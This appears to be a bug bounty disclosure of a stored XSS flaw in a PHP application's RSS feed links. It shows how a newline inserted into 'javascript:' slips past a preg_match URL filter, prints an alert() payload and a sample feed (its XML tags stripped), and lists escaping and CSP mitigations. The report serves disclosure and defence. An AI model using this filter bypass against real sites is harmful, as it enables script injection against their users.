toto

# 📜 Description Cross-site scripting (XSS) is a type of security vulnerability that can be found in some web applications. XSS attacks enable attackers to inject client-side scripts into web pages viewed by other users. The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on "normal" pages returned to other users in the course of regular browsing, without proper HTML escaping. In your application, stored XSS occurs when a user inject an XSS payload inside RSS feeds link. # 🕵️ Proof of Concept ## 1. Create new RSS item ![](https://i.imgur.com/4lTlaP5.png) ## 2. (Optional) Share it to the whole entity ![](https://i.imgur.com/4uhqFR5.png) ## 3. Click on the link ![](https://i.imgur.com/gb0tgpQ.png) ## 4. XSS is executed ! ![](https://i.imgur.com/74QZSOq.png) ## Bypass preg_match The following check function can be bypassed by inserting a new line (\n) inside the payload : ```php final public static function sanitizeURL(?string $url): string { if ($url === null) { return ''; } $url = trim($url); if (preg_match('/^javascript:/i', $url)) { return ''; } return $url; } ``` The payload is on two lines : ```xml java script:alert(`XSSSS!`) ``` Full content of the RSS feed : ```xml toto This is a simplified example of the RSS feed java script:alert(`XSSSS!`) 2021 fileformat.com All rights reserved Wed, 22 Jun 2021 00:01:00 +0000 Wed, 22 Jun 2021 16:20:00 +0000 1800 Ex2ample entry Here is some text containing an interesting description. http://example.com 9bd605d5-1921-8i67-dgft-65g635d3587u Wed, 22 Jun 2021 16:20:00 +0000 ``` # 🔐 Mitigations For XSS attacks to be successful, an attacker needs to insert and execute malicious content in a webpage. Each variable in a web application needs to be protected. Ensuring that all variables go through validation and are then escaped or sanitized is known as perfect injection resistance. Any variable that does not go through this process is a potential weakness. Frameworks make it easy to ensure variables are correctly validated and escaped or sanitised. In PHP, you can use the [htmlspecialchars](https://www.php.net/manual/en/function.htmlspecialchars.php) function to sanitize variables. As a last line of defense, you can use Content Security Policy (CSP) to reduce the severity of any XSS vulnerabilities that still occur or Web Application Firewall (WAF). # 📚 References - [OWASP - Cross Site Scripting (XSS)](https://owasp.org/www-community/attacks/xss/) - [OWASP - Cross Site Scripting Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html) - [Wikipedia - Cross-site scripting](https://en.wikipedia.org/wiki/Cross-site_scripting) - [PortSwigger - Cross-site scripting](https://portswigger.net/web-security/cross-site-scripting) - [PortSwigger - Stored XSS](https://portswigger.net/web-security/cross-site-scripting/stored) - [Mozilla - Content Security Policy (CSP)](https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP)

Query Builder